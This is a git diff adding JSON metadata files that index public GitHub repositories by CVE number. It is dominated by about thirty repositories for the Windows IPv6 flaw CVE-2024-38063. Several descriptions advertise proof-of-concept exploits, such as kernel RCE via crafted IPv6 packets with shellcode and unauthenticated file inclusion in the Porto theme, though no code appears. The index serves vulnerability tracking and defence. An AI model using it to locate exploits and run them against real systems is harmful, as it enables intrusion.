"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26022152?v=4", + "html_url": "https:\/\/github.com\/hnytgl", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hnytgl\/CVE-2024-38036", + "description": "排查ipv6使用情况", + "fork": false, + "created_at": "2024-08-16T01:38:21Z", + "updated_at": "2024-08-16T01:44:31Z", + "pushed_at": "2024-08-16T01:44:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-38041.json b/2024/CVE-2024-38041.json new file mode 100644 index 0000000000..71b21cad15 --- /dev/null +++ b/2024/CVE-2024-38041.json @@ -0,0 +1,33 @@ +[ + { + "id": 831586036, + "name": "CVE-2024-38041", + "full_name": "varwara\/CVE-2024-38041", + "owner": { + "login": "varwara", + "id": 167913816, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/167913816?v=4", + "html_url": "https:\/\/github.com\/varwara", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/varwara\/CVE-2024-38041", + "description": "Kernel pointers copied to output user mode buffer with ioctl 0x22A014 in the appid.sys driver.", + "fork": false, + "created_at": "2024-07-21T02:29:18Z", + "updated_at": "2024-12-27T13:05:29Z", + "pushed_at": "2024-07-21T02:35:59Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 7, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-3806.json b/2024/CVE-2024-3806.json new file mode 100644 index 0000000000..49d0d07736 --- /dev/null +++ b/2024/CVE-2024-3806.json @@ -0,0 +1,64 @@ +[ + { + "id": 798859489, + "name": "CVE-2024-3806-AND-CVE-2024-3807-Poc", + "full_name": "truonghuuphuc\/CVE-2024-3806-AND-CVE-2024-3807-Poc", + "owner": { + "login": "truonghuuphuc", + "id": 20487674, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20487674?v=4", + "html_url": "https:\/\/github.com\/truonghuuphuc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/truonghuuphuc\/CVE-2024-3806-AND-CVE-2024-3807-Poc", + "description": "CVE-2024-3806: Porto <= 7.1.0 - Unauthenticated Local File Inclusion via porto_ajax_posts CVE-2024-3807: Porto <= 7.1.0 - Authenticated (Contributor+) Local File Inclusion via Post Meta", + "fork": false, + "created_at": "2024-05-10T16:13:07Z", + "updated_at": "2024-12-15T18:49:18Z", + "pushed_at": "2024-05-10T17:58:19Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 890475222, + "name": "CVE-2024-3806", + "full_name": "RandomRobbieBF\/CVE-2024-3806", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-3806", + "description": "Porto <= 7.1.0 - Unauthenticated Local File Inclusion via porto_ajax_posts", + "fork": false, + "created_at": "2024-11-18T16:23:07Z", + "updated_at": "2025-01-06T13:38:17Z", + "pushed_at": "2024-11-18T16:23:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-38063.json b/2024/CVE-2024-38063.json new file mode 100644 index 0000000000..ca93507d32 --- /dev/null +++ b/2024/CVE-2024-38063.json @@ -0,0 +1,920 @@ +[ + { + "id": 842939338, + "name": "CVE-2024-38063", + "full_name": "diegoalbuquerque\/CVE-2024-38063", + "owner": { + "login": "diegoalbuquerque", + "id": 160813, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/160813?v=4", + "html_url": "https:\/\/github.com\/diegoalbuquerque", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/diegoalbuquerque\/CVE-2024-38063", + "description": "mitigation script by disabling ipv6 of all interfaces", + "fork": false, + "created_at": "2024-08-15T12:41:01Z", + "updated_at": "2024-08-27T10:04:08Z", + "pushed_at": "2024-08-15T13:53:45Z", + "stargazers_count": 15, + "watchers_count": 15, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 15, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 843636100, + "name": "CVE-2024-38063-VB", + "full_name": "noradlb1\/CVE-2024-38063-VB", + "owner": { + "login": "noradlb1", + "id": 74623428, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74623428?v=4", + "html_url": "https:\/\/github.com\/noradlb1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/noradlb1\/CVE-2024-38063-VB", + "description": "CVE-2024-38063 VB", + "fork": false, + "created_at": "2024-08-17T01:11:12Z", + "updated_at": "2024-08-17T01:20:05Z", + "pushed_at": "2024-08-17T01:20:02Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 843832661, + "name": "CVE-2024-38063-poc", + "full_name": "Sachinart\/CVE-2024-38063-poc", + "owner": { + "login": "Sachinart", + "id": 18497191, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18497191?v=4", + "html_url": "https:\/\/github.com\/Sachinart", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Sachinart\/CVE-2024-38063-poc", + "description": "Note: I am not responsible for any bad act. This is written by Chirag Artani to demonstrate the vulnerability.", + "fork": false, + "created_at": "2024-08-17T14:58:36Z", + "updated_at": "2024-11-28T16:04:55Z", + "pushed_at": "2024-08-28T20:56:40Z", + "stargazers_count": 83, + "watchers_count": 83, + "has_discussions": false, + "forks_count": 30, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 30, + "watchers": 83, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 844272199, + "name": "cve-2024-38063", + "full_name": "p33d\/cve-2024-38063", + "owner": { + "login": "p33d", + "id": 123099747, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/123099747?v=4", + "html_url": "https:\/\/github.com\/p33d", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/p33d\/cve-2024-38063", + "description": "Poc for cve-2024-38063 ", + "fork": false, + "created_at": "2024-08-18T22:24:43Z", + "updated_at": "2024-08-18T22:24:43Z", + "pushed_at": "2024-08-18T22:24:43Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 844698787, + "name": "CVE-2024-38063-Remediation", + "full_name": "dweger-scripts\/CVE-2024-38063-Remediation", + "owner": { + "login": "dweger-scripts", + "id": 174140925, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/174140925?v=4", + "html_url": "https:\/\/github.com\/dweger-scripts", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dweger-scripts\/CVE-2024-38063-Remediation", + "description": null, + "fork": false, + "created_at": "2024-08-19T19:44:37Z", + "updated_at": "2024-08-21T14:58:51Z", + "pushed_at": "2024-08-21T14:58:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 844930990, + "name": "Disable-IPv6-CVE-2024-38063-Fix", + "full_name": "almogopp\/Disable-IPv6-CVE-2024-38063-Fix", + "owner": { + "login": "almogopp", + "id": 37026702, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37026702?v=4", + "html_url": "https:\/\/github.com\/almogopp", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/almogopp\/Disable-IPv6-CVE-2024-38063-Fix", + "description": "A PowerShell script to temporarily mitigate the CVE-2024-38063 vulnerability by disabling IPv6 on Windows systems. This workaround modifies the registry to reduce the risk of exploitation without needing the immediate installation of the official Microsoft KB update. Intended as a temporary fix", + "fork": false, + "created_at": "2024-08-20T08:48:08Z", + "updated_at": "2024-08-20T08:50:31Z", + "pushed_at": "2024-08-20T08:50:28Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 846408465, + "name": "CVE-2024-38063", + "full_name": "Th3Tr1ckst3r\/CVE-2024-38063", + "owner": { + "login": "Th3Tr1ckst3r", + "id": 21149460, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21149460?v=4", + "html_url": "https:\/\/github.com\/Th3Tr1ckst3r", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Th3Tr1ckst3r\/CVE-2024-38063", + "description": "CVE-2024-38063 research so you don't have to.", + "fork": false, + "created_at": "2024-08-23T06:28:03Z", + "updated_at": "2024-08-31T00:54:01Z", + "pushed_at": "2024-08-30T22:18:44Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": true, + "topics": [ + "cve-2024-38063", + "cve-2024-38063-poc" + ], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 846999955, + "name": "CVE-2024-38063-Research-Tool", + "full_name": "haroonawanofficial\/CVE-2024-38063-Research-Tool", + "owner": { + "login": "haroonawanofficial", + "id": 148648539, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/148648539?v=4", + "html_url": "https:\/\/github.com\/haroonawanofficial", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/haroonawanofficial\/CVE-2024-38063-Research-Tool", + "description": "This is a functional proof of concept (PoC) for CVE-2024-38063. However, it's important to note that this CVE is theoretical and not exploitable in a real-world scenario. To enhance understanding for learners, I have developed a research tool that covers both past and newly reported TCP\/IP vulnerabilities in CVEs", + "fork": false, + "created_at": "2024-08-24T15:04:54Z", + "updated_at": "2024-11-19T05:55:14Z", + "pushed_at": "2024-08-26T06:18:08Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 847061153, + "name": "CVE-2024-38063", + "full_name": "ynwarcs\/CVE-2024-38063", + "owner": { + "login": "ynwarcs", + "id": 108408574, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108408574?v=4", + "html_url": "https:\/\/github.com\/ynwarcs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ynwarcs\/CVE-2024-38063", + "description": "poc for CVE-2024-38063 (RCE in tcpip.sys)", + "fork": false, + "created_at": "2024-08-24T18:25:46Z", + "updated_at": "2024-12-30T19:27:30Z", + "pushed_at": "2024-08-27T12:22:39Z", + "stargazers_count": 641, + "watchers_count": 641, + "has_discussions": false, + "forks_count": 115, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 115, + "watchers": 641, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 848337529, + "name": "CVE-2024-38063", + "full_name": "patchpoint\/CVE-2024-38063", + "owner": { + "login": "patchpoint", + "id": 174953042, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/174953042?v=4", + "html_url": "https:\/\/github.com\/patchpoint", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/patchpoint\/CVE-2024-38063", + "description": null, + "fork": false, + "created_at": "2024-08-27T15:21:25Z", + "updated_at": "2024-12-29T06:55:05Z", + "pushed_at": "2024-08-27T17:48:16Z", + "stargazers_count": 19, + "watchers_count": 19, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 19, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 848561863, + "name": "Windows-CVE-2024-38063", + "full_name": "PumpkinBridge\/Windows-CVE-2024-38063", + "owner": { + "login": "PumpkinBridge", + "id": 139355470, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/139355470?v=4", + "html_url": "https:\/\/github.com\/PumpkinBridge", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/PumpkinBridge\/Windows-CVE-2024-38063", + "description": "Windows TCP\/IP IPv6(CVE-2024-38063)", + "fork": false, + "created_at": "2024-08-28T01:46:44Z", + "updated_at": "2024-09-29T15:19:37Z", + "pushed_at": "2024-08-28T01:53:43Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 848706606, + "name": "CVE-2024-38063-POC", + "full_name": "zenzue\/CVE-2024-38063-POC", + "owner": { + "login": "zenzue", + "id": 19271340, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19271340?v=4", + "html_url": "https:\/\/github.com\/zenzue", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zenzue\/CVE-2024-38063-POC", + "description": "potential memory corruption vulnerabilities in IPv6 networks.", + "fork": false, + "created_at": "2024-08-28T08:57:23Z", + "updated_at": "2024-11-05T16:15:14Z", + "pushed_at": "2024-08-28T09:02:59Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 848885997, + "name": "CVE-2024-38063-", + "full_name": "AdminPentester\/CVE-2024-38063-", + "owner": { + "login": "AdminPentester", + "id": 179179494, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/179179494?v=4", + "html_url": "https:\/\/github.com\/AdminPentester", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AdminPentester\/CVE-2024-38063-", + "description": "Remotely Exploiting The Kernel Via IPv6", + "fork": false, + "created_at": "2024-08-28T15:28:14Z", + "updated_at": "2024-12-27T06:00:11Z", + "pushed_at": "2024-08-30T01:27:16Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 850339397, + "name": "CVE-2024-38063", + "full_name": "ThemeHackers\/CVE-2024-38063", + "owner": { + "login": "ThemeHackers", + "id": 107047730, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/107047730?v=4", + "html_url": "https:\/\/github.com\/ThemeHackers", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ThemeHackers\/CVE-2024-38063", + "description": "CVE-2024-38063 is a critical security vulnerability in the Windows TCP\/IP stack that allows for remote code execution (RCE)", + "fork": false, + "created_at": "2024-08-31T13:56:26Z", + "updated_at": "2024-12-15T05:49:42Z", + "pushed_at": "2024-12-15T05:49:39Z", + "stargazers_count": 17, + "watchers_count": 17, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 17, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 850609409, + "name": "CVE-2024-38063_PoC", + "full_name": "KernelKraze\/CVE-2024-38063_PoC", + "owner": { + "login": "KernelKraze", + "id": 82752974, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/82752974?v=4", + "html_url": "https:\/\/github.com\/KernelKraze", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/KernelKraze\/CVE-2024-38063_PoC", + "description": "This is a C language program designed to test the Windows TCP\/IP Remote Code Execution Vulnerability (CVE-2024-38063). It sends specially crafted IPv6 packets with embedded shellcode to exploit the vulnerability.", + "fork": false, + "created_at": "2024-09-01T09:20:02Z", + "updated_at": "2025-01-02T15:59:04Z", + "pushed_at": "2024-09-08T07:12:26Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 851150728, + "name": "cve-2024-38063", + "full_name": "ps-interactive\/cve-2024-38063", + "owner": { + "login": "ps-interactive", + "id": 35313392, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35313392?v=4", + "html_url": "https:\/\/github.com\/ps-interactive", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ps-interactive\/cve-2024-38063", + "description": null, + "fork": false, + "created_at": "2024-09-02T14:16:31Z", + "updated_at": "2024-09-02T14:16:55Z", + "pushed_at": "2024-09-02T14:16:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 851683675, + "name": "Cve-2024-38063", + "full_name": "Brownpanda29\/Cve-2024-38063", + "owner": { + "login": "Brownpanda29", + "id": 147920175, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/147920175?v=4", + "html_url": "https:\/\/github.com\/Brownpanda29", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Brownpanda29\/Cve-2024-38063", + "description": null, + "fork": false, + "created_at": "2024-09-03T14:36:35Z", + "updated_at": "2024-09-03T14:59:43Z", + "pushed_at": "2024-09-03T14:59:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 853823211, + "name": "quick-fix-cve-2024-38063", + "full_name": "FrancescoDiSalesGithub\/quick-fix-cve-2024-38063", + "owner": { + "login": "FrancescoDiSalesGithub", + "id": 17337009, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17337009?v=4", + "html_url": "https:\/\/github.com\/FrancescoDiSalesGithub", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/FrancescoDiSalesGithub\/quick-fix-cve-2024-38063", + "description": "quick powershell script to fix cve-2024-38063", + "fork": false, + "created_at": "2024-09-07T16:27:27Z", + "updated_at": "2024-09-08T08:59:32Z", + "pushed_at": "2024-09-08T08:59:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "blueteam", + "cve-2024-38063", + "fix", + "powershell", + "script", + "workaround" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 855027111, + "name": "CVE-2024-38063", + "full_name": "Faizan-Khanx\/CVE-2024-38063", + "owner": { + "login": "Faizan-Khanx", + "id": 156709479, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/156709479?v=4", + "html_url": "https:\/\/github.com\/Faizan-Khanx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Faizan-Khanx\/CVE-2024-38063", + "description": "CVE-2024-38063 - Remotely Exploiting The Kernel Via IPv6", + "fork": false, + "created_at": "2024-09-10T07:15:20Z", + "updated_at": "2024-09-10T12:34:53Z", + "pushed_at": "2024-09-10T10:19:14Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 860985934, + "name": "CVE-2024-38063-Medium", + "full_name": "ArenaldyP\/CVE-2024-38063-Medium", + "owner": { + "login": "ArenaldyP", + "id": 134998695, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/134998695?v=4", + "html_url": "https:\/\/github.com\/ArenaldyP", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ArenaldyP\/CVE-2024-38063-Medium", + "description": "Kode Eksploitasi CVE-2024-38063", + "fork": false, + "created_at": "2024-09-21T17:33:52Z", + "updated_at": "2024-09-22T16:03:48Z", + "pushed_at": "2024-09-22T16:03:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 861711766, + "name": "cve-2024-38063", + "full_name": "lnx-dvlpr\/cve-2024-38063", + "owner": { + "login": "lnx-dvlpr", + "id": 169969340, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/169969340?v=4", + "html_url": "https:\/\/github.com\/lnx-dvlpr", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lnx-dvlpr\/cve-2024-38063", + "description": null, + "fork": false, + "created_at": "2024-09-23T11:45:42Z", + "updated_at": "2024-09-25T12:01:17Z", + "pushed_at": "2024-09-25T12:01:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 869344169, + "name": "CVE-2024-38063", + "full_name": "becrevex\/CVE-2024-38063", + "owner": { + "login": "becrevex", + "id": 8326868, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8326868?v=4", + "html_url": "https:\/\/github.com\/becrevex", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/becrevex\/CVE-2024-38063", + "description": null, + "fork": false, + "created_at": "2024-10-08T06:24:54Z", + "updated_at": "2024-11-18T05:45:15Z", + "pushed_at": "2024-11-16T06:07:24Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 872589341, + "name": "CVE-2024-38063", + "full_name": "idkwastaken\/CVE-2024-38063", + "owner": { + "login": "idkwastaken", + "id": 180330197, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/180330197?v=4", + "html_url": "https:\/\/github.com\/idkwastaken", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/idkwastaken\/CVE-2024-38063", + "description": null, + "fork": false, + "created_at": "2024-10-14T17:46:58Z", + "updated_at": "2024-10-14T17:59:59Z", + "pushed_at": "2024-10-14T17:59:56Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 872765524, + "name": "CVE-2024-38063", + "full_name": "thanawee321\/CVE-2024-38063", + "owner": { + "login": "thanawee321", + "id": 53590032, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53590032?v=4", + "html_url": "https:\/\/github.com\/thanawee321", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/thanawee321\/CVE-2024-38063", + "description": "Vulnerability CVE-2024-38063", + "fork": false, + "created_at": "2024-10-15T03:18:51Z", + "updated_at": "2024-11-20T16:31:07Z", + "pushed_at": "2024-10-18T11:48:06Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 884730855, + "name": "cve-2024-38063-Anonyvader", + "full_name": "AliHj98\/cve-2024-38063-Anonyvader", + "owner": { + "login": "AliHj98", + "id": 99630322, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99630322?v=4", + "html_url": "https:\/\/github.com\/AliHj98", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AliHj98\/cve-2024-38063-Anonyvader", + "description": null, + "fork": false, + "created_at": "2024-11-07T09:36:32Z", + "updated_at": "2024-11-07T10:47:56Z", + "pushed_at": "2024-11-07T10:47:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 889577031, + "name": "CVE-2024-38063", + "full_name": "Dragkob\/CVE-2024-38063", + "owner": { + "login": "Dragkob", + "id": 141576033, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/141576033?v=4", + "html_url": "https:\/\/github.com\/Dragkob", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Dragkob\/CVE-2024-38063", + "description": "PoC for Windows' IPv6 CVE-2024-38063", + "fork": false, + "created_at": "2024-11-16T17:22:08Z", + "updated_at": "2024-11-22T00:18:36Z", + "pushed_at": "2024-11-20T13:18:16Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "bsod", + "bsod-crashes", + "cve", + "cvepoc", + "dos", + "ipv6", + "ipv6-network", + "poc" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 890443568, + "name": "CVE-2024-38063", + "full_name": "selenagomez25\/CVE-2024-38063", + "owner": { + "login": "selenagomez25", + "id": 92699085, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92699085?v=4", + "html_url": "https:\/\/github.com\/selenagomez25", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/selenagomez25\/CVE-2024-38063", + "description": "poc for exploiting cve-2024-38063", + "fork": false, + "created_at": "2024-11-18T15:20:24Z", + "updated_at": "2024-11-20T15:30:14Z", + "pushed_at": "2024-11-18T15:21:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 899722656, + "name": "Windows-CVE-2024-38063", + "full_name": "Laukage\/Windows-CVE-2024-38063", + "owner": { + "login": "Laukage", + "id": 46964809, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46964809?v=4", + "html_url": "https:\/\/github.com\/Laukage", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Laukage\/Windows-CVE-2024-38063", + "description": null, + "fork": false, + "created_at": "2024-12-06T21:45:09Z", + "updated_at": "2024-12-06T22:54:04Z", + "pushed_at": "2024-12-06T22:54:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 906855654, + "name": "CVE-2024-38063", + "full_name": "jamesbishop785\/CVE-2024-38063", + "owner": { + "login": "jamesbishop785", + "id": 135285523, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/135285523?v=4", + "html_url": "https:\/\/github.com\/jamesbishop785", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jamesbishop785\/CVE-2024-38063", + "description": null, + "fork": false, + "created_at": "2024-12-22T05:28:56Z", + "updated_at": "2024-12-22T06:27:11Z", + "pushed_at": "2024-12-22T06:27:08Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-38077.json b/2024/CVE-2024-38077.json new file mode 100644 index 0000000000..75620e916f --- /dev/null +++ 